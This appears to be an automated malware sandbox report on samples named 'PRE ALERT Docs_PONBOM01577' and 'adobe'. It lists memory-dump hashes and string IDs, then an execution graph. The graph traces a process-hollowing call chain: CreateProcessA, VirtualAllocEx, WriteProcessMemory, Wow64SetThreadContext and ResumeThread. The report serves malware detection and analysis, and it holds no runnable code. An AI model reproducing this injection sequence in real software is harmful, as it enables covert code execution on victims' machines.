                        • Opcode ID: 96414a6c051fc4d25b4a0ae8437948dbd06bbcf9ce226ffad02a34322af3c183
                        • Instruction ID: a9ac1750db51dda7cc5801c5c6b219cf1b9194f2aed9bb83336a03b5d32b81fb
                        • Opcode Fuzzy Hash: 96414a6c051fc4d25b4a0ae8437948dbd06bbcf9ce226ffad02a34322af3c183
                        • Instruction Fuzzy Hash: EA016D31B101115FDF64AA6DA45072BA3DADBCA714F248839E50ECF784EE65DD024395
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cd28c4dc0a53e1b2da7797e79b09ec9e59b61effd8d84a80ce851a1cfaa678f1
                        • Instruction ID: 79f3f5a91fddeed78b8b876c9a1e770922b1efe16325ba4bb2463ace532e97d1
                        • Opcode Fuzzy Hash: cd28c4dc0a53e1b2da7797e79b09ec9e59b61effd8d84a80ce851a1cfaa678f1
                        • Instruction Fuzzy Hash: F8013C31B104155FDB65AA6DA854B2F67DBEBC9614F148839E90ECF344EA25DC034385
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12bf5dd2925318e98840695eec72364f3bac43dae179ef3fb718b88751e021f1
                        • Instruction ID: 54d983df9a437d3a34405cbbf2a9359f6a8036fd17f3f0e8da37d0285aa50bfb
                        • Opcode Fuzzy Hash: 12bf5dd2925318e98840695eec72364f3bac43dae179ef3fb718b88751e021f1
                        • Instruction Fuzzy Hash: C7018131B101155FCBA0EB6DE46472BB3D6EB8A614F108829E50ECF784EA21DD028781
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 907529bcc788f746dd8235cb7f4110f90d20c02d2c89a1ac297302186568b6b1
                        • Instruction ID: 2b47d219e35db39e1e7f1d5e09744e96d50bbfceab72c298a4411ac5286d043e
                        • Opcode Fuzzy Hash: 907529bcc788f746dd8235cb7f4110f90d20c02d2c89a1ac297302186568b6b1
                        • Instruction Fuzzy Hash: 33F0A732E20224DBDB146A75EC10A9EB37AE784764F104425E902AB384D775A8008BC0
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fa818b3d7e299ea2379730ea7d75633c4199f476cb2ad06aa32e73be13225741
                        • Instruction ID: c59c831174972f7ba01d6fbc0d6146dd1f5621adbea1e17bf81d0c61b6ce0a83
                        • Opcode Fuzzy Hash: fa818b3d7e299ea2379730ea7d75633c4199f476cb2ad06aa32e73be13225741
                        • Instruction Fuzzy Hash: 89E0D871D05248ABDB10DBB4C945B8A779DDB42304F2088E5E405CF141E637C9015791
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-2222239885
                        • Opcode ID: 710f75a20878e8e8c0d5e7298b5d1a20f61e109129c45f0574d6b8276a5c53fb
                        • Instruction ID: 448a235049d84e420fb2b5af69761b0ef6c8758a5c1ecef5f0df2c8c1f384fbf
                        • Opcode Fuzzy Hash: 710f75a20878e8e8c0d5e7298b5d1a20f61e109129c45f0574d6b8276a5c53fb
                        • Instruction Fuzzy Hash: C712EA30E012198FDB64EF69C954A9DB7F2BF88704F2095A9D40AAF254DB30DD86CF91
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-3823777903
                        • Opcode ID: 0a40701b7eea197779ebd7ed464a9bfe3870da481af35f139c03a71835fd34f9
                        • Instruction ID: 3c17ffc0131d3a41669c6e2d45b48b01d97dcd56067ade0d50be6ba142e3a38d
                        • Opcode Fuzzy Hash: 0a40701b7eea197779ebd7ed464a9bfe3870da481af35f139c03a71835fd34f9
                        • Instruction Fuzzy Hash: 25915B30E01209DFDB68EF69D994B6EBBB2BF84310F108529D512AF398DB349945CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-390881366
                        • Opcode ID: c54be79f839174412219355269166f695750c3457f8762927b3c6d362d99b309
                        • Instruction ID: 2ea9dfe2cd1d8e4cd1a04a6cef22d316e7a9636dbd11eb8fe72c195bb387d2c9
                        • Opcode Fuzzy Hash: c54be79f839174412219355269166f695750c3457f8762927b3c6d362d99b309
                        • Instruction Fuzzy Hash: 79F1F830A00209CFDB59EF65D594B6EB7B2BF88340F258568D4159F3A8DB31EC86CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-2392861976
                        • Opcode ID: bdfef2ddeaf451e3d924036dc1657a923ba4d8ec71bad3a2689d6ffde8a31730
                        • Instruction ID: ee42e9dbd8c74f3ec76ed9e2edb754c7e0a91242a93edec2b9fbf8e50950d1d1
                        • Opcode Fuzzy Hash: bdfef2ddeaf451e3d924036dc1657a923ba4d8ec71bad3a2689d6ffde8a31730
                        • Instruction Fuzzy Hash: 2771BD30E042098FDB98EFA9D5906AEB7F2FF84300B108969D406DF799DB31AC45CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q
                        • API String ID: 0-2125118731
                        • Opcode ID: f6a78bc9c88f6fb967be6e0b7eb6c50a8b34bb60ea39cf2605fd129142aee386
                        • Instruction ID: 9b162a845411605fd8f99109cd2f081462a243a621f7fedb5215a794288adc7e
                        • Opcode Fuzzy Hash: f6a78bc9c88f6fb967be6e0b7eb6c50a8b34bb60ea39cf2605fd129142aee386
                        • Instruction Fuzzy Hash: 05B14B30A00209CFDB69EF69D5907AEB7B2BF88300F248969D4159F395DB75DC86CB90
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: LR^q$LR^q$$^q$$^q
                        • API String ID: 0-2454687669
                        • Opcode ID: 20f4f8da9bcefd4a1fc273190e2008a7395151a10873be912ddd438037c1916d
                        • Instruction ID: 666a0b9f7f43089dbdfb9c1e1701698f02f9e96cd7a3317a4602f42461ad49d6
                        • Opcode Fuzzy Hash: 20f4f8da9bcefd4a1fc273190e2008a7395151a10873be912ddd438037c1916d
                        • Instruction Fuzzy Hash: 0751BF31B00201CFDB58EB28D984A6AB7F6FF88704B148568E4169F3A5EB34EC45CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q
                        • API String ID: 0-2125118731
                        • Opcode ID: c6e172c190f1fbd16d66535049d7443073a64792591fbda6948690c500a4a85c
                        • Instruction ID: bd7b05be6b79bb96025a598936a69a5b4a040eff4ee303f27b00624738eb61a4
                        • Opcode Fuzzy Hash: c6e172c190f1fbd16d66535049d7443073a64792591fbda6948690c500a4a85c
                        • Instruction Fuzzy Hash: AB518F30F112059FDF65EB68D990AAEB7B2EB89310F258529D50ADF345DB31DC82CB90

                        Execution Graph

                        Execution Coverage:10.2%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:237
                        Total number of Limit Nodes:10
                        execution_graph 26234 4ead818 FindCloseChangeNotification 26235 4ead87f 26234->26235 25978 149d040 25979 149d086 GetCurrentProcess 25978->25979 25981 149d0d8 GetCurrentThread 25979->25981 25982 149d0d1 25979->25982 25983 149d10e 25981->25983 25984 149d115 GetCurrentProcess 25981->25984 25982->25981 25983->25984 25987 149d14b 25984->25987 25985 149d173 GetCurrentThreadId 25986 149d1a4 25985->25986 25987->25985 25988 149d690 DuplicateHandle 25989 149d726 25988->25989 26236 149acb0 26237 149acbf 26236->26237 26240 149ada8 26236->26240 26248 149ad97 26236->26248 26241 149adb9 26240->26241 26242 149addc 26240->26242 26241->26242 26256 149b031 26241->26256 26260 149b040 26241->26260 26242->26237 26243 149add4 26243->26242 26244 149afe0 GetModuleHandleW 26243->26244 26245 149b00d 26244->26245 26245->26237 26249 149ad9c 26248->26249 26250 149addc 26249->26250 26254 149b031 LoadLibraryExW 26249->26254 26255 149b040 LoadLibraryExW 26249->26255 26250->26237 26251 149add4 26251->26250 26252 149afe0 GetModuleHandleW 26251->26252 26253 149b00d 26252->26253 26253->26237 26254->26251 26255->26251 26258 149b034 26256->26258 26257 149b079 26257->26243 26258->26257 26264 149a130 26258->26264 26262 149b054 26260->26262 26261 149b079 26261->26243 26262->26261 26263 149a130 LoadLibraryExW 26262->26263 26263->26261 26265 149b220 LoadLibraryExW 26264->26265 26267 149b299 26265->26267 26267->26257 26226 4eab880 26227 4eaba0b 26226->26227 26228 4eab8a6 26226->26228 26228->26227 26230 4ea7e18 26228->26230 26231 4eabb00 PostMessageW 26230->26231 26233 4eabb6c 26231->26233 26233->26228 25990 4ea9cb4 25991 4ea9c8e 25990->25991 25992 4ea9c9e 25990->25992 25996 4eaa640 25991->25996 26016 4eaa6b6 25991->26016 26037 4eaa650 25991->26037 25997 4eaa650 25996->25997 26057 4eab308 25997->26057 26069 4eab097 25997->26069 26078 4eaaf56 25997->26078 26083 4eaab96 25997->26083 26091 4eaae56 25997->26091 26099 4eaab72 25997->26099 26107 4eaab1c 25997->26107 26111 4eab19c 25997->26111 26116 4eaafff 25997->26116 26124 4eaacd9 25997->26124 26136 4eaabb8 25997->26136 26148 4eaac45 25997->26148 26152 4eaafc6 25997->26152 26156 4eaad60 25997->26156 26160 4eaada3 25997->26160 26170 4eaaf8d 25997->26170 26174 4eaaeef 25997->26174 25998 4eaa672 25998->25992 26017 4eaa644 26016->26017 26018 4eaa6b9 26016->26018 26020 4eab308 4 API calls 26017->26020 26021 4eaaeef 2 API calls 26017->26021 26022 4eaaf8d 2 API calls 26017->26022 26023 4eaada3 2 API calls 26017->26023 26024 4eaad60 2 API calls 26017->26024 26025 4eaafc6 2 API calls 26017->26025 26026 4eaac45 2 API calls 26017->26026 26027 4eaabb8 4 API calls 26017->26027 26028 4eaacd9 4 API calls 26017->26028 26029 4eaafff 2 API calls 26017->26029 26030 4eab19c 2 API calls 26017->26030 26031 4eaab1c 2 API calls 26017->26031 26032 4eaab72 2 API calls 26017->26032 26033 4eaae56 2 API calls 26017->26033 26034 4eaab96 2 API calls 26017->26034 26035 4eaaf56 2 API calls 26017->26035 26036 4eab097 2 API calls 26017->26036 26018->25992 26019 4eaa672 26019->25992 26020->26019 26021->26019 26022->26019 26023->26019 26024->26019 26025->26019 26026->26019 26027->26019 26028->26019 26029->26019 26030->26019 26031->26019 26032->26019 26033->26019 26034->26019 26035->26019 26036->26019 26038 4eaa66a 26037->26038 26040 4eab308 4 API calls 26038->26040 26041 4eaaeef 2 API calls 26038->26041 26042 4eaaf8d 2 API calls 26038->26042 26043 4eaada3 2 API calls 26038->26043 26044 4eaad60 2 API calls 26038->26044 26045 4eaafc6 2 API calls 26038->26045 26046 4eaac45 2 API calls 26038->26046 26047 4eaabb8 4 API calls 26038->26047 26048 4eaacd9 4 API calls 26038->26048 26049 4eaafff 2 API calls 26038->26049 26050 4eab19c 2 API calls 26038->26050 26051 4eaab1c 2 API calls 26038->26051 26052 4eaab72 2 API calls 26038->26052 26053 4eaae56 2 API calls 26038->26053 26054 4eaab96 2 API calls 26038->26054 26055 4eaaf56 2 API calls 26038->26055 26056 4eab097 2 API calls 26038->26056 26039 4eaa672 26039->25992 26040->26039 26041->26039 26042->26039 26043->26039 26044->26039 26045->26039 26046->26039 26047->26039 26048->26039 26049->26039 26050->26039 26051->26039 26052->26039 26053->26039 26054->26039 26055->26039 26056->26039 26058 4eaab7e 26057->26058 26060 4eaabdd 26057->26060 26059 4eab52f 26058->26059 26061 4eaae1e 26058->26061 26178 4ea95b0 26058->26178 26182 4ea95aa 26058->26182 26059->25998 26186 4ea94e8 26060->26186 26190 4ea94f0 26060->26190 26067 4ea95aa WriteProcessMemory 26061->26067 26068 4ea95b0 WriteProcessMemory 26061->26068 26062 4eab2e9 26062->26062 26067->26062 26068->26062 26072 4eaab7e 26069->26072 26070 4eab3c1 26070->25998 26071 4eaae1e 26076 4ea95aa WriteProcessMemory 26071->26076 26077 4ea95b0 WriteProcessMemory 26071->26077 26072->26070 26072->26071 26074 4ea95aa WriteProcessMemory 26072->26074 26075 4ea95b0 WriteProcessMemory 26072->26075 26073 4eab2e9 26074->26072 26075->26072 26076->26073 26077->26073 26079 4eab3c7 26078->26079 26194 4ea969a 26079->26194 26198 4ea96a0 26079->26198 26080 4eab3e9 26085 4eaab7e 26083->26085 26084 4eaae1e 26089 4ea95aa WriteProcessMemory 26084->26089 26090 4ea95b0 WriteProcessMemory 26084->26090 26085->26084 26087 4ea95aa WriteProcessMemory 26085->26087 26088 4ea95b0 WriteProcessMemory 26085->26088 26086 4eab2e9 26087->26085 26088->26085 26089->26086 26090->26086 26094 4eaab7e 26091->26094 26092 4eaae1e 26095 4ea95aa WriteProcessMemory 26092->26095 26096 4ea95b0 WriteProcessMemory 26092->26096 26093 4eab2e9 26094->26092 26097 4ea95aa WriteProcessMemory 26094->26097 26098 4ea95b0 WriteProcessMemory 26094->26098 26095->26093 26096->26093 26097->26094 26098->26094 26102 4eaab7e 26099->26102 26100 4eaae1e 26103 4ea95aa WriteProcessMemory 26100->26103 26104 4ea95b0 WriteProcessMemory 26100->26104 26101 4eab2e9 26102->26100 26105 4ea95aa WriteProcessMemory 26102->26105 26106 4ea95b0 WriteProcessMemory 26102->26106 26103->26101 26104->26101 26105->26102 26106->26102 26202 4ea9838 26107->26202 26206 4ea982e 26107->26206 26113 4eaaf06 26111->26113 26112 4eab1b0 26113->26112 26210 4ea8f28 26113->26210 26214 4ea8f30 26113->26214 26118 4eaab7e 26116->26118 26117 4eaae1e 26122 4ea95aa WriteProcessMemory 26117->26122 26123 4ea95b0 WriteProcessMemory 26117->26123 26118->26117 26120 4ea95aa WriteProcessMemory 26118->26120 26121 4ea95b0 WriteProcessMemory 26118->26121 26119 4eab2e9 26120->26118 26121->26118 26122->26119 26123->26119 26125 4eaabdd 26124->26125 26134 4ea94e8 VirtualAllocEx 26125->26134 26135 4ea94f0 VirtualAllocEx 26125->26135 26126 4eab52f 26126->25998 26127 4eaae1e 26130 4ea95aa WriteProcessMemory 26127->26130 26131 4ea95b0 WriteProcessMemory 26127->26131 26128 4eaab7e 26128->26126 26128->26127 26132 4ea95aa WriteProcessMemory 26128->26132 26133 4ea95b0 WriteProcessMemory 26128->26133 26129 4eab2e9 26129->26129 26130->26129 26131->26129 26132->26128 26133->26128 26134->26128 26135->26128 26137 4eaabc5 26136->26137 26142 4ea94e8 VirtualAllocEx 26137->26142 26143 4ea94f0 VirtualAllocEx 26137->26143 26138 4eab52f 26138->25998 26139 4eaae1e 26144 4ea95aa WriteProcessMemory 26139->26144 26145 4ea95b0 WriteProcessMemory 26139->26145 26140 4eab2e9 26141 4eaab7e 26141->26138 26141->26139 26146 4ea95aa WriteProcessMemory 26141->26146 26147 4ea95b0 WriteProcessMemory 26141->26147 26142->26141 26143->26141 26144->26140 26145->26140 26146->26141 26147->26141 26149 4eaac4b 26148->26149 26150 4ea8f28 ResumeThread 26149->26150 26151 4ea8f30 ResumeThread 26149->26151 26150->26149 26151->26149 26218 4ea8fd8 26152->26218 26222 4ea8fe0 26152->26222 26153 4eaafe0 26158 4ea8fd8 Wow64SetThreadContext 26156->26158 26159 4ea8fe0 Wow64SetThreadContext 26156->26159 26157 4eaad83 26157->25998 26158->26157 26159->26157 26168 4ea95aa WriteProcessMemory 26160->26168 26169 4ea95b0 WriteProcessMemory 26160->26169 26161 4eaae18 26164 4ea95aa WriteProcessMemory 26161->26164 26165 4ea95b0 WriteProcessMemory 26161->26165 26162 4eab2e9 26163 4eaab7e 26163->26161 26166 4ea95aa WriteProcessMemory 26163->26166 26167 4ea95b0 WriteProcessMemory 26163->26167 26164->26162 26165->26162 26166->26163 26167->26163 26168->26163 26169->26163 26171 4eaaf07 26170->26171 26172 4ea8f28 ResumeThread 26171->26172 26173 4ea8f30 ResumeThread 26171->26173 26172->26171 26173->26171 26175 4eaaef5 26174->26175 26176 4ea8f28 ResumeThread 26175->26176 26177 4ea8f30 ResumeThread 26175->26177 26176->26175 26177->26175 26179 4ea95b4 WriteProcessMemory 26178->26179 26181 4ea964f 26179->26181 26181->26058 26183 4ea95b0 WriteProcessMemory 26182->26183 26185 4ea964f 26183->26185 26185->26058 26187 4ea94f0 VirtualAllocEx 26186->26187 26189 4ea956d 26187->26189 26189->26058 26191 4ea94f4 VirtualAllocEx 26190->26191 26193 4ea956d 26191->26193 26193->26058 26195 4ea96a0 ReadProcessMemory 26194->26195 26197 4ea972f 26195->26197 26197->26080 26199 4ea96a4 ReadProcessMemory 26198->26199 26201 4ea972f 26199->26201 26201->26080 26203 4ea983c CreateProcessA 26202->26203 26205 4ea9a83 26203->26205 26207 4ea9838 26206->26207 26207->26207 26208 4ea9a26 CreateProcessA 26207->26208 26209 4ea9a83 26208->26209 26211 4ea8f30 ResumeThread 26210->26211 26213 4ea8fa1 26211->26213 26213->26113 26215 4ea8f34 ResumeThread 26214->26215 26217 4ea8fa1 26215->26217 26217->26113 26219 4ea8fe0 Wow64SetThreadContext 26218->26219 26221 4ea906d 26219->26221 26221->26153 26223 4ea8fe4 Wow64SetThreadContext 26222->26223 26225 4ea906d 26223->26225 26225->26153

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 296 149d030-149d032 297 149d034 296->297 298 149d036-149d03a 296->298 297->298 299 149d03c-149d03d 298->299 300 149d03e-149d0cf GetCurrentProcess 298->300 299->300 304 149d0d8-149d10c GetCurrentThread 300->304 305 149d0d1-149d0d7 300->305 306 149d10e-149d114 304->306 307 149d115-149d149 GetCurrentProcess 304->307 305->304 306->307 308 149d14b-149d151 307->308 309 149d152-149d16d call 149d618 307->309 308->309 313 149d173-149d1a2 GetCurrentThreadId 309->313 314 149d1ab-149d20d 313->314 315 149d1a4-149d1aa 313->315 315->314
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 0149D0BE
                        • GetCurrentThread.KERNEL32 ref: 0149D0FB
                        • GetCurrentProcess.KERNEL32 ref: 0149D138
                        • GetCurrentThreadId.KERNEL32 ref: 0149D191
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 46d145db6d2a597f4896aa55e046dcb947f24b25ef24f1b0565ecd46ddc11b98
                        • Instruction ID: 3adb82d2c9a8e81fc905287bcf687a820b021d6b0829d79be4807a4412eccebc
                        • Opcode Fuzzy Hash: 46d145db6d2a597f4896aa55e046dcb947f24b25ef24f1b0565ecd46ddc11b98
                        • Instruction Fuzzy Hash: 875155B0D002498FDB14CFAAD949BDEBFF1AF48308F20C46AD059A7361D7349984CB65

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 322 149d040-149d0cf GetCurrentProcess 326 149d0d8-149d10c GetCurrentThread 322->326 327 149d0d1-149d0d7 322->327 328 149d10e-149d114 326->328 329 149d115-149d149 GetCurrentProcess 326->329 327->326 328->329 330 149d14b-149d151 329->330 331 149d152-149d16d call 149d618 329->331 330->331 335 149d173-149d1a2 GetCurrentThreadId 331->335 336 149d1ab-149d20d 335->336 337 149d1a4-149d1aa 335->337 337->336
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 0149D0BE
                        • GetCurrentThread.KERNEL32 ref: 0149D0FB
                        • GetCurrentProcess.KERNEL32 ref: 0149D138
                        • GetCurrentThreadId.KERNEL32 ref: 0149D191
                        Memory Dump Source
                        • Source File: 00000003.00000002.1789241828.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_1490000_adobe.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 613f8b93197fbfefcc648396023f3d0c9fffb41a62463c40a982157513c087d3
                        • Instruction ID: 3638229d61d4e3a7549925d5744b201d1d32591f7b23ce65a104f04a2ea30b63
                        • Opcode Fuzzy Hash: 613f8b93197fbfefcc648396023f3d0c9fffb41a62463c40a982157513c087d3
                        • Instruction Fuzzy Hash: C15124B0E002498FDB14DFAAD949B9EBFF1AF48314F20C46AD459A7360D7349984CF65

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 444 4ea982e-4ea9836 445 4ea9838-4ea983b 444->445 446 4ea983c-4ea98cd 444->446 445->446 448 4ea98cf-4ea98d9 446->448 449 4ea9906-4ea9926 446->449 448->449 450 4ea98db-4ea98dd 448->450 456 4ea9928-4ea9932 449->456 457 4ea995f-4ea998e 449->457 451 4ea98df-4ea98e9 450->451 452 4ea9900-4ea9903 450->452 454 4ea98eb 451->454 455 4ea98ed-4ea98fc 451->455 452->449 454->455 455->455 459 4ea98fe 455->459 456->457 458 4ea9934-4ea9936 456->458 465 4ea9990-4ea999a 457->465 466 4ea99c7-4ea9a81 CreateProcessA 457->466 460 4ea9938-4ea9942 458->460 461 4ea9959-4ea995c 458->461 459->452 463 4ea9946-4ea9955 460->463 464 4ea9944 460->464 461->457 463->463 467 4ea9957 463->467 464->463 465->466 468 4ea999c-4ea999e 465->468 477 4ea9a8a-4ea9b10 466->477 478 4ea9a83-4ea9a89 466->478 467->461 470 4ea99a0-4ea99aa 468->470 471 4ea99c1-4ea99c4 468->471 472 4ea99ae-4ea99bd 470->472 473 4ea99ac 470->473 471->466 472->472 475 4ea99bf 472->475 473->472 475->471 488 4ea9b12-4ea9b16 477->488 489 4ea9b20-4ea9b24 477->489 478->477 488->489 490 4ea9b18 488->490 491 4ea9b26-4ea9b2a 489->491 492 4ea9b34-4ea9b38 489->492 490->489 491->492 495 4ea9b2c 491->495 493 4ea9b3a-4ea9b3e 492->493 494 4ea9b48-4ea9b4c 492->494 493->494 496 4ea9b40 493->496 497 4ea9b5e-4ea9b65 494->497 498 4ea9b4e-4ea9b54 494->498 495->492 496->494 499 4ea9b7c 497->499 500 4ea9b67-4ea9b76 497->500 498->497 502 4ea9b7d 499->502 500->499 502->502
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04EA9A6E
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: d0dced0d94ab1a29c12c1cecfaad6af5f01b58a754bd1eabc9ecdbc0abecfc3f
                        • Instruction ID: d9a21c4bccbe09beed0ecb59819b50739208a4e5f72469d4e2819468db739c33
                        • Opcode Fuzzy Hash: d0dced0d94ab1a29c12c1cecfaad6af5f01b58a754bd1eabc9ecdbc0abecfc3f
                        • Instruction Fuzzy Hash: 46A17BB1D002199FEF10CF68C8407DEBBB2EF48314F0485A9E859AB241DB74A995CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 503 4ea9838-4ea98cd 506 4ea98cf-4ea98d9 503->506 507 4ea9906-4ea9926 503->507 506->507 508 4ea98db-4ea98dd 506->508 514 4ea9928-4ea9932 507->514 515 4ea995f-4ea998e 507->515 509 4ea98df-4ea98e9 508->509 510 4ea9900-4ea9903 508->510 512 4ea98eb 509->512 513 4ea98ed-4ea98fc 509->513 510->507 512->513 513->513 517 4ea98fe 513->517 514->515 516 4ea9934-4ea9936 514->516 523 4ea9990-4ea999a 515->523 524 4ea99c7-4ea9a81 CreateProcessA 515->524 518 4ea9938-4ea9942 516->518 519 4ea9959-4ea995c 516->519 517->510 521 4ea9946-4ea9955 518->521 522 4ea9944 518->522 519->515 521->521 525 4ea9957 521->525 522->521 523->524 526 4ea999c-4ea999e 523->526 535 4ea9a8a-4ea9b10 524->535 536 4ea9a83-4ea9a89 524->536 525->519 528 4ea99a0-4ea99aa 526->528 529 4ea99c1-4ea99c4 526->529 530 4ea99ae-4ea99bd 528->530 531 4ea99ac 528->531 529->524 530->530 533 4ea99bf 530->533 531->530 533->529 546 4ea9b12-4ea9b16 535->546 547 4ea9b20-4ea9b24 535->547 536->535 546->547 548 4ea9b18 546->548 549 4ea9b26-4ea9b2a 547->549 550 4ea9b34-4ea9b38 547->550 548->547 549->550 553 4ea9b2c 549->553 551 4ea9b3a-4ea9b3e 550->551 552 4ea9b48-4ea9b4c 550->552 551->552 554 4ea9b40 551->554 555 4ea9b5e-4ea9b65 552->555 556 4ea9b4e-4ea9b54 552->556 553->550 554->552 557 4ea9b7c 555->557 558 4ea9b67-4ea9b76 555->558 556->555 560 4ea9b7d 557->560 558->557 560->560
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04EA9A6E
                        Memory Dump Source
                        • Source File: 00000003.00000002.1793424398.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_4ea0000_adobe.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: cbbe2edb01e82c6af9b58f843f74a0701431e96bfb840c4540fe10149de9e347
                        • Instruction ID: e0f52516f0248c260c60f3e32138e5f9cfbe053cc5cc21975ecc338b520ff3bd
                        • Opcode Fuzzy Hash: cbbe2edb01e82c6af9b58f843f74a0701431e96bfb840c4540fe10149de9e347
                        • Instruction Fuzzy Hash: 42917BB1D00219DFDF20CF68C8407DEBBB2BF48314F1485AAE859AB251DB74A995CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
